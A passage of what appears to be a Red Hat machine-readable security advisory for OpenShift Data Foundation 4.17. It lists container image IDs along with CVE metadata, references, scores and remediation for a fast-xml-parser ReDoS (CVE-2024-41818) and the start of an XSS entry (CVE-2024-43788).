"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-41818"
},
{
"category": "external",
"summary": "RHBZ#2300499",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300499"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-41818",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41818"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-41818",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41818"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/src/v5/valueParsers/currency.js#L10"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/d0bfe8a3a2813a185f39591bbef222212d856164"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-mpg4-rc92-vx8v"
}
],
"release_date": "2024-07-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "fast-xml-parser: ReDOS at currency parsing in currency.js"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
